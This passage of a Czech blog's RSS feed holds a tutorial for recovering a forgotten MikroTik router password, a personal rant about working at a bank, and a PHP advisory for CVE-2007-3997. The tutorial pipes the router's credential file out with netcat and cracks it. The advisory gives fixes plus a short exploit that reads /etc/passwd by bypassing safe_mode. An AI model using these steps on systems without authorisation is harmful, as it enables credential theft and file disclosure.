		<link>http://hodza.net/2008/03/07/hacked-gallery/</link>
		<comments>http://hodza.net/2008/03/07/hacked-gallery/#comments</comments>
		<pubDate>Fri, 07 Mar 2008 08:28:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Bezpečnost]]></category>

		<category><![CDATA[Hack/Crack]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/07/hacked-gallery/</guid>
		<description><![CDATA[Stručný obsah příspěvku zde není uveden, protože tento příspěvek je chráněný heslem.]]></description>
			<content:encoded><![CDATA[<form action="http://hodza.net/wp-pass.php" method="post">
<p>Tento příspěvek je chráněný heslem. Pokud jej chcete zobrazit, zadejte své heslo:</p>
<p><label for="pwbox-81">Heslo:<br />
<input name="post_password" id="pwbox-81" type="password" size="20" /></label><br />
<input type="submit" name="Submit" value="Uložit" /></p></form>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/07/hacked-gallery/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Mikrotik password recovery aneb zapomenuté heslo - žádný problém</title>
		<link>http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/</link>
		<comments>http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/#comments</comments>
		<pubDate>Wed, 13 Feb 2008 11:43:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Bezpečnost]]></category>

		<category><![CDATA[Distribuce]]></category>

		<category><![CDATA[Hack/Crack]]></category>

		<category><![CDATA[Hardware]]></category>

		<category><![CDATA[Mikrotik]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/</guid>
		<description><![CDATA[Přináším Vám postup, jak se lehce z Kubuntu Linuxu dostaneme k zapomenutému heslu na routerboardu se systémem Mikrotik.
1. Zapojíme USB-&#62;COM redukci. U mě se redukce namapuje na ttyUSB0 - viz hláška z dmesg
[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0
2. Nainstalujeme TFTP server
# sudo apt-get install atftpd

3. Opravíme konfiguraci démona xinet přidáním parametru [...]]]></description>
			<content:encoded><![CDATA[<p>Přináším Vám postup, jak se lehce z Kubuntu Linuxu dostaneme k zapomenutému heslu na routerboardu se systémem Mikrotik.</p>
<p>1. Zapojíme USB-&gt;COM redukci. U mě se redukce namapuje na ttyUSB0 - viz hláška z dmesg</p>
<p><code>[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0</code></p>
<p>2. Nainstalujeme TFTP server<br />
<code># sudo apt-get install atftpd</code></p>
<p><span id="more-80"></span></p>
<p>3. Opravíme konfiguraci démona xinet přidáním parametru &#8220;-inetd_compat&#8221;<br />
<code># sudo vi /etc/default/xinetd</code><br />
<code>XINETD_OPTS="-stayalive -inetd_compat"</code></p>
<p>4. Nahrajeme alternativní kernel s podporou yaffs2 do adresáře /tftpboot</p>
<p>5. Nainstalujeme DHCP server<br />
<code># sudo apt-get install dhcp3-server</code></p>
<p>6. Nastavíme parametry DHCP serveru<br />
<code># sudo vi /etc/dhcp3/dhcpd.conf</code><br />
<code>default-lease-time 21600;<br />
max-lease-time 43200;<br />
option domain-name-servers 10.0.0.1;<br />
option netbios-name-servers 10.0.0.1;<br />
option netbios-node-type 8;<br />
option www-server 10.0.0.1;<br />
authoritative;<br />
allow booting;<br />
allow bootp;</code></p>
<p><code>subnet 10.0.0.0 netmask 255.255.255.0<br />
{<br />
option routers 10.0.0.1;<br />
option subnet-mask 255.255.255.0;<br />
option broadcast-address 10.0.0.255;<br />
filename "/tftpboot/linuxrc";<br />
range 10.0.0.10 10.0.0.100;<br />
}</code></p>
<p>7. Nastavíme IP adresu na našem síťovém rozhraní, spustíme DHCP a TFTP server<br />
<code>sudo ifconfig eth0 down<br />
sudo ifconfig eth0 10.0.0.1 up<br />
sudo /etc/init.d/xinetd restart<br />
sudo /etc/init.d/dhcp3-server start</code></p>
<p>8. Spustíme konfiguraci minicomu<br />
<code># minimcom -s</code></p>
<p>Vybereme položku &#8220;Nastavení sériového portu&#8221; a nastavíme následující parametry:</p>
<p><code>A - Sériové zařízení           : /dev/ttyUSB0<br />
B - Umístění zámku             : /var/lock<br />
C - Program pro příchozí volání:<br />
D - Program pro odchozí volání :<br />
E - Bps/Par/Bity               : 115200 8N1<br />
F - Hardwarová kontrola toku   : Ano<br />
G - Softwarová kontrola toku   : Ne</code></p>
<p>Připojíme kabel do Mikrotiku<br />
Mělo by se zobrazit:<br />
<code>MikroTik 2.9.46<br />
MikroTik Login:</code></p>
<p>Rebootujeme Mikrotik</p>
<p>Zobrazí se:<br />
<code>RouterBOOT booter 2.10<br />
RouterBoard 532A<br />
CPU frequency: 399 MHz<br />
Memory size:  64 MB<br />
Press any key within 2 seconds to enter setup.</code></p>
<p>Zmáčkneme libovolnou klávesu dříve, než vyprší interval.</p>
<p>Zobrazí se:<br />
<code>RouterBOOT-2.10<br />
What do you want to configure?<br />
d - boot delay<br />
k - boot key<br />
s - serial console<br />
o - boot device<br />
u - cpu mode<br />
f - try cpu frequency<br />
c - keep cpu frequency<br />
r - reset configuration<br />
e - format nand<br />
g - upgrade firmware<br />
i - board info<br />
p - boot protocol<br />
t - do memory testing<br />
x - exit setup<br />
your choice:</code></p>
<p>Vyberme &#8220;o&#8221; pro volbu &#8220;boot device&#8221;.</p>
<p>Zobrazí se:<br />
<code>Select boot device:<br />
e - boot over Ethernet<br />
* n - boot from NAND, if fail then Ethernet<br />
c - boot from CompactFlash only<br />
1 - boot Ethernet once, then NAND<br />
2 - boot Ethernet once, then CompactFlash<br />
o - boot from NAND only<br />
b - boot chosen device<br />
your choice:</code></p>
<p>Vybereme &#8220;1&#8243; pro boot z Ethernetu (a následně NAND)</p>
<p>Zobrazí se:<br />
<code>RouterBOOT-2.10<br />
What do you want to configure?<br />
d - boot delay<br />
k - boot key<br />
s - serial console<br />
o - boot device<br />
u - cpu mode<br />
f - try cpu frequency<br />
c - keep cpu frequency<br />
r - reset configuration<br />
e - format nand<br />
g - upgrade firmware<br />
i - board info<br />
p - boot protocol<br />
t - do memory testing<br />
x - exit setup<br />
your choice:</code></p>
<p>Vybereme &#8220;p&#8221; pro &#8220;boot protocol&#8221;.</p>
<p>Zobrazí se:<br />
<code>Choose which boot protocol to use:<br />
1 - bootp protocol<br />
* 2 - dhcp protocol<br />
your choice:</code></p>
<p>Vybereme &#8220;2&#8243; pro &#8220;dhcp&#8221; protocol&#8221;</p>
<p>Zobrazí se nám opět úvodní menu<br />
<code>What do you want to configure?<br />
d - boot delay<br />
k - boot key<br />
s - serial console<br />
o - boot device<br />
u - cpu mode<br />
f - try cpu frequency<br />
c - keep cpu frequency<br />
r - reset configuration<br />
e - format nand<br />
g - upgrade firmware<br />
i - board info<br />
p - boot protocol<br />
t - do memory testing<br />
x - exit setup<br />
your choice:</code></p>
<p>Vybereme &#8220;x&#8221; pro uložení a opuštění setupu. Mikrotik se znovu rebootuje.</p>
<p>Nyní by se měl načíst nový kernel - v mém případě z opravené distribuce OpenWrt<br />
<code>BusyBox v1.4.2 (2008-01-15 11:43:12 CET) Built-in shell (ash)<br />
Enter 'help' for a list of built-in commands.<br />
_______                     ________        __<br />
|       |.-----.-----.-----.|  |  |  |.----.|  |_<br />
|   -   ||  _  |  -__|     ||  |  |  ||   _||   _|<br />
|_______||   __|_____|__|__||________||__|  |____|<br />
|__| W I R E L E S S   F R E E D O M<br />
KAMIKAZE (7.09) -----------------------------------<br />
* 10 oz Vodka       Shake well with ice and strain<br />
* 10 oz Triple sec  mixture into 10 shot glasses.<br />
* 10 oz lime juice  Salute!<br />
---------------------------------------------------<br />
root@OpenWrt:/#</code></p>
<p>Vypíšeme si jednotlivé blokové zařízení<br />
<code>#cat /proc/mtd</code><br />
<code>dev:    size   erasesize  name<br />
mtd0: 00400000 00004000 "RouterBoard NAND Boot"<br />
mtd1: 03c00000 00004000 "RouterBoard NAND Main"</code></p>
<p>Připojíme filesystém na kterém jsou uložena hesla<br />
<code># mount -t yaffs2 -o ro /dev/mtdblock1 /mnt</code></p>
<p>Na PC si spustíme netcat s následujícími parametry<br />
<code>sudo /bin/netcat -l -p 666 &gt; user.dat</code></p>
<p>Na mikrotiku zobrazíme soubor s hesly a přes netcat ho pošleme do PC<br />
<code>cat /mnt/nova/store/user.dat|nc 10.0.0.1 666</code></p>
<p>Na PX spustíme nástroj na lámání hesel<br />
<code># ./mtpass user.dat</code><br />
<code>mtpass v0.2 - MikroTik RouterOS password recovery tool<br />
Reading file user.dat, 213 bytes long<br />
Rec# | Username        | Password           | Disable flag   | User comment<br />
--------------------------------------------------------------------------------------------<br />
1    | admin           | mojeheslo          |                | system default user</code></p>
<p>Návod vychází z informací na stránkách <a title="Mikrotik password recovery" href="http://manio.skyboo.net/mikrotik/">http://manio.skyboo.net/mikrotik/</a><br />
Autor neručí za případné škody při použití tohoto návodu.</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Raiffeisen bank &#038; Ebanka - práce a kariéra? Ne děkuji - já zůstanu doma!</title>
		<link>http://hodza.net/2008/01/22/raiffeisen-bank-ebanka-prace-a-kariera-ne-dekuji-ja-zustanu-doma/</link>
		<comments>http://hodza.net/2008/01/22/raiffeisen-bank-ebanka-prace-a-kariera-ne-dekuji-ja-zustanu-doma/#comments</comments>
		<pubDate>Tue, 22 Jan 2008 01:42:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Ze života]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/01/22/raiffeisen-bank-ebanka-prace-a-kariera-ne-dekuji-ja-zustanu-doma/</guid>
		<description><![CDATA[Je již notná chvíle po půlnoci a já jsem naštvaný. Dnes za to nemůže žádný klient, šéf ba dokonce ani naše rozdivočená kočka co rozbila sváteční vázu. Bavit se budeme o Ebance a Rajfce.
Jako každý správný Čech bych mohl začít nadávat na nový sazebník - na drahé výběry z bankomatu, poplatek za vklad v hotovosti, [...]]]></description>
			<content:encoded><![CDATA[<p>Je již notná chvíle po půlnoci a já jsem naštvaný. Dnes za to nemůže žádný klient, šéf ba dokonce ani naše rozdivočená kočka co rozbila sváteční vázu. Bavit se budeme o Ebance a Rajfce.</p>
<p>Jako každý správný Čech bych mohl začít nadávat na nový sazebník - na drahé výběry z bankomatu, poplatek za vklad v hotovosti, vysokou částku za schválení úvěru či na dalších milion věcí, které se mi nelíbí. Jenomže to není to, co mě dnes trápí.</p>
<p><span id="more-79"></span></p>
<p>Už nějaký ten pátek bydlím nedaleko jedné pobočky Ebanky, ve které shodou okolností začala před rokem a půl pracovat má přítelkyně. Zprvu jsem byl opravdu nadšený. Jako pracovnice &#8220;kóól centra&#8221; sice domů nenosila desetitisíce, ale já byl rád, že si rychle našla nějakou práci a že ji mám takříkajíc za rohem. Co mi na její práci vadilo nebyly občasné noční směny, ale spíše zodpovědnost a hlavně stres, který si sem-tam z práce donesla domů. Některé večery tak byly trošku vypjaté, ale postupem času se vždy atmosféra uklidnila a my se společně mohli některým pracovním problémům už jen smát.</p>
<p>Bohužel jak se brzy ukázalo, tato idylka nám netrvala dlouho. Šéfové Ebanky zřejmě oprášili přísloví &#8220;nové koště dobře mete&#8221; a tak začalo přibývat nočních směn a přesčasů. Výplatní pásku jsem doma nikdy přítelkyni nekontroloval, ale podle jejího výrazu v den výplaty a stále stejného počtu šminek (a dalších kosmetických přípravků v koupelně) si troufám tvrdit, že noční směny nabyly nějak závratně oceněny - jestli vůbec&#8230;</p>
<p>Skoro jsem si začal myslet, že naše nekonečné pracovní martyrium utichá, když se na veřejnosti objevila zpráva, že Rajfka skupuje Ebanku. Zprvu se v našem malém městečku nic nedělo a tak nebyl důvod podléhat panice. O to horší to však mělo spád později. Z doslechu vím, že na &#8220;kóólu&#8221; do poslední chvíle nikdo nevěděl, co se bude dít a zda-li nebude jeho místo zrušeno. Přítelkyně se ve vší prozíravosti nechala raději dopředu přeřadit na jiné místo. Nalákána byla na stálou pracovní dobu a minimum komunikace s klienty Ebanky. Pro ostatní nebyl konec nikterak slavný. Někteří z existenčních důvodů raději přešli na jinou pobočku (do jiného města), jiní byli přeřazeni a ti ostatní takříkajíc odešli s prázdnou.</p>
<p>Už jsem se těšil, jak náš život opět zapadne do těch starých a stereotypních kolejí. Bohužel mi to ale zase nevyšlo. Blížil se totiž čas vánočních svátků a pracovní doba mé přítelkyně se přes všechny sliby opět začala prodlužovat jako týden před výplatou. Poslední dny ve starém roce tak nestrávila úklidem domácnosti, zdobením stromečku či pečením cukroví, ale spíše jako nějaká programátorka za konzolí. Takto to pokračovalo až do 31.12., kdy odpoledne dostala konečně padla (a mě tak ubyla starost, jak se dostat do Ebanky, abych si se svou vlastní přítelkyní mohl alespoň na Silvestra dát pusu a připít šampaňského).</p>
<p>Nový rok v Ebance začal docela poklidně. Vedení zřejmě ještě vykazovalo známky intoxikace alkoholem, neboť přítelkyně dostala dokonce po více jak jednom roku týdenní dovolenou. Mohla si tedy užívat celých 7 dní bez klávesnice, monitoru a trvalého zvonění telefonu. Mně bylo zcela jasné, že její tělo není schopno tak velkou dávku relaxace zvládnout. Tuto skutečnost také potvrdil první den po dovolené obvodní lékař, který jí dal namísto obrázku či lízátka neschopenku do dalšího pondělí. Naštěstí pro nás má Ebanka vlastní &#8220;šamany&#8221;, kteří vás okamžitě dokáží nadzvednout z postele (a to doslova). Pro naši léčbu jim přišla jako nejlepší varianta změny prostředí, takže od začátku ledna svou přítelkyni postrádám a postrádat (nejdříve) do března budu, neboť je na služební cestě v 300km od domova.</p>
<p>Jako klient Ebanky jsem nespokojený již dlouho. Jako přítel zaměstnankyně Ebanky mě štve, jak s ní zacházejí. Desítky hodin přesčasů, žádná možnost vybrat si dovolenou, plat jako pro herce z ochotnického divadla a po tom všem vás klidně jako bonus pošlou na několik měsíců 300km od vašeho domova protože jste v daném místě (vetším městě) levná pracovní síla. Stále ještě přemýšlíte pro tuto společnost pracovat?</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/01/22/raiffeisen-bank-ebanka-prace-a-kariera-ne-dekuji-ja-zustanu-doma/feed/</wfw:commentRss>
		</item>
		<item>
		<title>PHP</title>
		<link>http://hodza.net/2007/10/15/php/</link>
		<comments>http://hodza.net/2007/10/15/php/#comments</comments>
		<pubDate>Mon, 15 Oct 2007 11:10:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Bezpečnost]]></category>

		<category><![CDATA[Hack/Crack]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[MySQL]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=23</guid>
		<description><![CDATA[První díl, ze &#8220;seriálu o bezpečnosti&#8221;, aneb tuníme náš server&#8230;

Vztahuje se k:
&#60; = PHP 5.2.3
&#60;= PHP 4.4.7
CVE:
CVE-2007-3997
Problém:
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.
Detail:
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.
Řešení:
1) Kompilovat MySQL klienta s parametrem &#8220;&#8211;disable-local-infile&#8221;
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem [...]]]></description>
			<content:encoded><![CDATA[<p>První díl, ze &#8220;seriálu o bezpečnosti&#8221;, aneb tuníme náš server&#8230;</p>
<p><span id="more-23"></span></p>
<p><strong>Vztahuje se k:</strong><br />
&lt; = PHP 5.2.3<br />
&lt;= PHP 4.4.7</p>
<p><strong>CVE:</strong><br />
CVE-2007-3997</p>
<p><strong>Problém:</strong><br />
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.</p>
<p><strong>Detail:</strong><br />
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.</p>
<p><strong>Řešení:</strong><br />
1) Kompilovat MySQL klienta s parametrem &#8220;&#8211;disable-local-infile&#8221;<br />
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem &#8220;mysqli-&gt;options(MYSQLI_OPT_LOCAL_INFILE, 1);&#8221;<br />
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) &#8220;set-variable=local-infile=0&#8243;.</p>
<p><strong>Exploit:</strong><br />
function r($fp, &amp;$buf, $len, &amp;$err) {print fread($fp, $len);}<br />
$m = new mysqli(&#8217;localhost&#8217;, &#8216;aaaa&#8217;, &#8221;, &#8216;a&#8217;);<br />
$m-&gt;options(MYSQLI_OPT_LOCAL_INFILE, 1);<br />
$m-&gt;set_local_infile_handler(&#8221;r&#8221;);<br />
$m-&gt;query(&#8221;LOAD DATA LOCAL INFILE &#8216;/etc/passwd&#8217; INTO TABLE a.a&#8221;);<br />
$m-&gt;close();</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2007/10/15/php/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
